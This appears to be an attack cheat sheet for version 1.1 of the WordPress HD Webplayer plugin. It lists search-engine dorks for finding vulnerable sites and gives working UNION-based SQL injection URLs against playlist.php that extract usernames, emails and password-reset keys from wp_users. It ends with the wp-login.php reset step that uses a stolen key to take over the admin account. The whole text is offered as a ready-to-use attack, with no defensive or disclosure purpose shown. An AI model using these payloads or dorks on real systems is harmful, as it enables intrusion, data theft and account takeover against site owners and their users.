Hackingwordpress_part2

1. ===============================================================================================
2. = SQL Injection: WordPress HD Webplayer – Version 1.1 =
3. = =
4. ===============================================================================================
5. METODO 1 "Dork's"
6. ===============================================================================================
7. #DORK 1
8. inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
9.  
10. #DORK 2
11. HD_Webplayer_Commercial_Key logo.jpg topleft 50 http
12.  
13. ===============================================================================================
14. METODO 2 "Dork's"
15. ===============================================================================================
16. # Dork 1 (config.php)
17. inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
18.  
19. # Dork 2 (playlist.php)
20. inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
21.  
22. # Dork 3 (General):
23. inurl:"/wp-content/plugins/hd-webplayer/"
24. ===============================================================================================
25. METODO 1
26. ===============================================================================================
27. 1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users
28. ===============================================================================================
29. 2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users
30. ===============================================================================================
31. 3 : wp-login.php?action=rp&key=KEY&login=admin
32. ===============================================================================================
33. METODO 2
34. ===============================================================================================
35. 1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
36. ===============================================================================================
37. 2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
38. ===============================================================================================
39. 3 : wp-login.php?action=rp&key=KEY&login=admin
40. ===============================================================================================